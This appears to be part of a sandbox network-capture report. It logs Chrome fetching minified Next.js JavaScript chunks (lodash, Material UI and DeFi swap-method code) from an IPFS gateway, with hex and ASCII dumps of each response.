                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 31 32 30 22 3a 22 47 22 2c 22 5c 75 30 31 32 32 22 3a 22 47 22 2c 22 5c 75 30 31 31 64 22 3a 22 67 22 2c 22 5c 75 30 31 31 66 22 3a 22 67 22 2c 22 5c 75 30 31 32 31 22 3a 22 67 22 2c 22 5c 75 30 31 32 33 22 3a 22 67 22 2c 22 5c 75 30 31 32 34 22 3a 22 48 22 2c 22 5c 75 30 31 32 36 22 3a 22 48 22 2c 22 5c 75 30 31 32 35 22 3a 22 68 22 2c 22 5c 75 30 31 32 37 22 3a 22 68 22 2c 22 5c 75 30 31 32 38 22 3a 22 49 22 2c 22 5c 75 30 31 32 61 22 3a 22 49 22 2c 22 5c 75 30 31 32 63 22 3a 22 49 22 2c 22 5c 75 30 31 32 65 22 3a 22 49 22 2c 22 5c 75 30 31 33 30 22 3a 22 49 22 2c 22 5c 75 30 31 32 39 22 3a 22 69 22 2c 22 5c 75 30 31 32 62 22 3a 22 69 22 2c 22 5c 75 30 31 32 64 22 3a 22 69 22 2c 22 5c 75 30 31 32 66 22 3a 22 69 22 2c 22 5c 75 30 31 33 31 22 3a 22 69 22
                                                                                                                                                                                                                                                  Data Ascii: 120":"G","\u0122":"G","\u011d":"g","\u011f":"g","\u0121":"g","\u0123":"g","\u0124":"H","\u0126":"H","\u0125":"h","\u0127":"h","\u0128":"I","\u012a":"I","\u012c":"I","\u012e":"I","\u0130":"I","\u0129":"i","\u012b":"i","\u012d":"i","\u012f":"i","\u0131":"i"
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 22 2b 63 74 5b 6e 5d 7d 66 75 6e 63 74 69 6f 6e 20 66 72 28 6e 29 7b 72 65 74 75 72 6e 20 65 74 2e 74 65 73 74 28 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 6e 29 7b 76 61 72 20 74 3d 2d 31 2c 72 3d 41 72 72 61 79 28 6e 2e 73 69 7a 65 29 3b 72 65 74 75 72 6e 20 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 72 5b 2b 2b 74 5d 3d 5b 65 2c 6e 5d 7d 29 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 63 72 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6e 28 74 28 72 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 72 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 2d 31 2c 65 3d 6e 2e 6c 65 6e 67 74 68 2c 75 3d 30 2c 69 3d 5b 5d 3b 2b 2b 72 3c 65 3b 29 7b 76 61 72 20 6f 3d 6e 5b 72 5d 3b 6f 21 3d
                                                                                                                                                                                                                                                  Data Ascii: "+ct[n]}function fr(n){return et.test(n)}function ar(n){var t=-1,r=Array(n.size);return n.forEach((function(n,e){r[++t]=[e,n]})),r}function cr(n,t){return function(r){return n(t(r))}}function lr(n,t){for(var r=-1,e=n.length,u=0,i=[];++r<e;){var o=n[r];o!=
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 22 29 2c 50 6e 3d 79 74 3f 74 2e 42 75 66 66 65 72 3a 75 2c 71 6e 3d 74 2e 53 79 6d 62 6f 6c 2c 5a 6e 3d 74 2e 55 69 6e 74 38 41 72 72 61 79 2c 4b 6e 3d 50 6e 3f 50 6e 2e 61 6c 6c 6f 63 55 6e 73 61 66 65 3a 75 2c 56 6e 3d 63 72 28 49 6e 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 49 6e 29 2c 47 6e 3d 49 6e 2e 63 72 65 61 74 65 2c 48 6e 3d 57 6e 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2c 4a 6e 3d 53 6e 2e 73 70 6c 69 63 65 2c 59 6e 3d 71 6e 3f 71 6e 2e 69 73 43 6f 6e 63 61 74 53 70 72 65 61 64 61 62 6c 65 3a 75 2c 51 6e 3d 71 6e 3f 71 6e 2e 69 74 65 72 61 74 6f 72 3a 75 2c 74 74 3d 71 6e 3f 71 6e 2e 74 6f 53 74 72 69 6e 67 54 61 67 3a 75 2c 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 6e 3d 68 69 28 49 6e 2c
                                                                                                                                                                                                                                                  Data Ascii: "),Pn=yt?t.Buffer:u,qn=t.Symbol,Zn=t.Uint8Array,Kn=Pn?Pn.allocUnsafe:u,Vn=cr(In.getPrototypeOf,In),Gn=In.create,Hn=Wn.propertyIsEnumerable,Jn=Sn.splice,Yn=qn?qn.isConcatSpreadable:u,Qn=qn?qn.iterator:u,tt=qn?qn.toStringTag:u,et=function(){try{var n=hi(In,


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  38192.168.2.549751209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC504OUTGET /_next/static/chunks/6782.5dfef7893dd5bea4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 24489
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreies3zcd6e6alsnndbmz4wqavngwp6dlzarbg5xj2pvfe3fqqqgaa4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/6782.5dfef7893dd5bea4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreies3zcd6e6alsnndbmz4wqavngwp6dlzarbg5xj2pvfe3fqqqgaa4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028477
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 62 31 65 36 34 31 61 31 62 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41b1e641a1b-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 37 38 32 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 72 28 36 34 39 33 38 29 29 2c 69 3d 72 28 38 35 38 39 33 29 2c 61 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6782],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6d 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 74 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d
                                                                                                                                                                                                                                                  Data Ascii: m",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[t.fontSize],color:{primary:(e.vars||e).palette.primary.m
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 41 72 72 61 79 28 65 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 3b 72 65 74 75 72 6e 20 72 2e 72 65 64 75 63 65 28 28 28 65 2c 6e 2c 6f 29 3d 3e 28 65 2e 70 75 73 68 28 6e 29 2c 6f 3c 72 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 74 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 76 3d 28 30 2c 6c 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 5b 74 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 74 7d 29 3d 3e 7b 6c 65 74 20 72 3d
                                                                                                                                                                                                                                                  Data Ascii: Array(e).filter(Boolean);return r.reduce(((e,n,o)=>(e.push(n),o<r.length-1&&e.push(i.cloneElement(t,{key:`separator-${o}`})),e)),[])}const v=(0,l.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,t)=>[t.root]})((({ownerState:e,theme:t})=>{let r=
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 3d 6d 7d 2c 35 32 31 30 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 44 69 72 65 63 74 43 6f 6e 74 72 61 63 74 4d 65 74 68 6f 64 73 3d 74 2e 44 69 72 65 63 74 43 6f 6e 74 72 61 63 74 4d 65 74 68 6f 64 73 57 69 74 68 46 65 65 4d 6f 64 65 6c 3d 74 2e 43 6f 6e 74 72 61 63 74 4d 65 74 68 6f 64 3d 74 2e 53 77 61 70 53 69 64 65 3d 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 42 55 59 3d 22 42 55 59 22 2c 65 2e 53 45 4c 4c 3d 22 53 45 4c 4c 22 7d 28 74 2e 53 77 61 70 53 69 64 65 7c 7c 28 74 2e 53 77 61 70 53 69 64 65 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65
                                                                                                                                                                                                                                                  Data Ascii: =m},52102:function(e,t){var r;Object.defineProperty(t,"__esModule",{value:!0}),t.DirectContractMethods=t.DirectContractMethodsWithFeeModel=t.ContractMethod=t.SwapSide=void 0,function(e){e.BUY="BUY",e.SELL="SELL"}(t.SwapSide||(t.SwapSide={})),function(e){e
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 77 61 70 4f 6e 55 6e 69 73 77 61 70 46 6f 72 6b 2c 72 2e 62 75 79 4f 6e 55 6e 69 73 77 61 70 46 6f 72 6b 2c 72 2e 73 77 61 70 4f 6e 55 6e 69 73 77 61 70 56 32 46 6f 72 6b 2c 72 2e 62 75 79 4f 6e 55 6e 69 73 77 61 70 56 32 46 6f 72 6b 2c 72 2e 73 77 61 70 4f 6e 5a 65 72 6f 58 76 32 2c 72 2e 73 77 61 70 4f 6e 5a 65 72 6f 58 76 34 5d 2e 63 6f 6e 63 61 74 28 74 2e 44 69 72 65 63 74 43 6f 6e 74 72 61 63 74 4d 65 74 68 6f 64 73 57 69 74 68 46 65 65 4d 6f 64 65 6c 29 7d 2c 33 32 35 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 74 2e 4f 5a 3d 74 2e 50 43 3d 76 6f 69 64 20 30 3b 76 61 72 20 6e 3d 72 28 35 32 31 30 32 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 50 43 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c
                                                                                                                                                                                                                                                  Data Ascii: wapOnUniswapFork,r.buyOnUniswapFork,r.swapOnUniswapV2Fork,r.buyOnUniswapV2Fork,r.swapOnZeroXv2,r.swapOnZeroXv4].concat(t.DirectContractMethodsWithFeeModel)},32524:function(e,t,r){t.OZ=t.PC=void 0;var n=r(52102);Object.defineProperty(t,"PC",{enumerable:!0,
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 52 65 66 6c 65 63 74 7c 7c 21 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 29 72 65 74 75 72 6e 21 31 3b 69 66 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 50 72 6f 78 79 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 70 3d 6c 28 29 3f 52 65 66 6c
                                                                                                                                                                                                                                                  Data Ascii: Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"===typeof Proxy)return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],(function(){}))),!0}catch(e){return!1}}function p(e,t,r){return p=l()?Refl
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 61 74 6f 72 22 2c 63 3d 6f 2e 74 6f 53 74 72 69 6e 67 54 61 67 7c 7c 22 40 40 74 6f 53 74 72 69 6e 67 54 61 67 22 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 72 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 2c 65 5b 74 5d 7d 74 72 79 7b 73 28 7b 7d 2c 22 22 29 7d 63 61 74 63 68 28 43 29 7b 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 65 5b 74 5d 3d 72 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 72 2c 6e 29 7b 76 61 72 20 6f 3d 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 20 69 6e 73 74 61 6e 63 65 6f 66 20
                                                                                                                                                                                                                                                  Data Ascii: ator",c=o.toStringTag||"@@toStringTag";function s(e,t,r){return Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}),e[t]}try{s({},"")}catch(C){s=function(e,t,r){return e[t]=r}}function u(e,t,r,n){var o=t&&t.prototype instanceof
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 6e 76 6f 6b 65 28 74 2c 65 29 7d 29 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 6f 2c 69 2c 61 2c 63 29 7b 76 61 72 20 73 3d 6c 28 65 5b 6f 5d 2c 65 2c 69 29 3b 69 66 28 22 74 68 72 6f 77 22 21 3d 3d 73 2e 74 79 70 65 29 7b 76 61 72 20 75 3d 73 2e 61 72 67 2c 70 3d 75 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 70 26 26 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 70 26 26 6e 2e 63 61 6c 6c 28 70 2c 22 5f 5f 61 77 61 69 74 22 29 3f 74 2e 72 65 73 6f 6c 76 65 28 70 2e 5f 5f 61 77 61 69 74 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 28 22 6e 65 78 74 22 2c 65 2c 61 2c 63 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b
                                                                                                                                                                                                                                                  Data Ascii: on(e){return this._invoke(t,e)}))}))}function O(e,t){function r(o,i,a,c){var s=l(e[o],e,i);if("throw"!==s.type){var u=s.arg,p=u.value;return p&&"object"===typeof p&&n.call(p,"__await")?t.resolve(p.__await).then((function(e){r("next",e,a,c)}),(function(e){
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 74 68 69 73 2e 72 65 73 65 74 28 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 72 3d 65 5b 69 5d 3b 69 66 28 72 29 72 65 74 75 72 6e 20 72 2e 63 61 6c 6c 28 65 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 65 2e 6e 65 78 74 29 72 65 74 75 72 6e 20 65 3b 69 66 28 21 69 73 4e 61 4e 28 65 2e 6c 65 6e 67 74 68 29 29 7b 76 61 72 20 6f 3d 2d 31 2c 61 3d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 66 6f 72 28 3b 2b 2b 6f 3c 65 2e 6c 65 6e 67 74 68 3b 29 69 66 28 6e 2e 63 61 6c 6c 28 65 2c 6f 29 29 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3d 65 5b 6f 5d 2c 72 2e 64 6f 6e 65 3d 21 31 2c 72 3b 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3d 74 2c 72 2e 64 6f 6e 65 3d 21 30 2c 72 7d 3b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                  Data Ascii: this.reset(!0)}function P(e){if(e){var r=e[i];if(r)return r.call(e);if("function"===typeof e.next)return e;if(!isNaN(e.length)){var o=-1,a=function r(){for(;++o<e.length;)if(n.call(e,o))return r.value=e[o],r.done=!1,r;return r.value=t,r.done=!0,r};return


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  39192.168.2.549753209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC504OUTGET /_next/static/chunks/3652.76d2fc48524771f4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1358INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 7220
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreic4ifwyjs7ekuekrsbx4g5xsfipcix46uqrucinh3dvmtmefngysu"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/3652.76d2fc48524771f4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreic4ifwyjs7ekuekrsbx4g5xsfipcix46uqrucinh3dvmtmefngysu
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 646866
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 62 31 65 34 36 31 35 39 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41b1e46159f-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1306INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 36 35 32 5d 2c 7b 38 37 30 35 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 6f 3d 72 28 36 33 33 36 36 29 2c 61 3d 72 28 38 37 34 36 32 29 2c 69 3d 72 28 36 37 32 39 34 29 2c 6e 3d 72 28 38 36 30 31 30 29 2c 6c 3d 72 28 39 34 37 38 30 29 2c 73 3d 72 28 34 31 37 39 36 29 2c 64 3d 72 28 38 33 31 38 37 29 2c 63 3d 72 28 33 36 36 32 32 29 2c 75 3d 72 28 37 38 38 38 34 29 2c 70 3d 72 28 38 31 37 31 39 29 2c 66 3d 72 28 33 34 38 36 37 29
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3652],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var o=r(63366),a=r(87462),i=r(67294),n=r(86010),l=r(94780),s=r(41796),d=r(83187),c=r(36622),u=r(78884),p=r(81719),f=r(34867)
